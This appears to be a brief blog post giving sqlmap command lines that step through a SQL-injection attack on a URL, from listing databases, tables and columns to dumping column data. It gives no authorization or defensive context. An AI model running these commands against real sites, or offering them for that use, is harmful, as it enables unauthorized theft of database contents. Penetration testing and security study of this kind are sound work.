For fetching available Database
>python2 sqlmap.py -u <url> --dbsFor fetching available Tables on Database
>python2 sqlmap.py -u <url> -D <name of database> --tablesFor fetching available Columns in Tables
>python2 sqlmap.py -u <url> -D <name of database> -T <name of table> --columnsFor dumping the data available in columns
>python2 sqlmap.py -u <url> -D <name of database> -T <name of table> -C <name of column> --dump
Comments
Post a Comment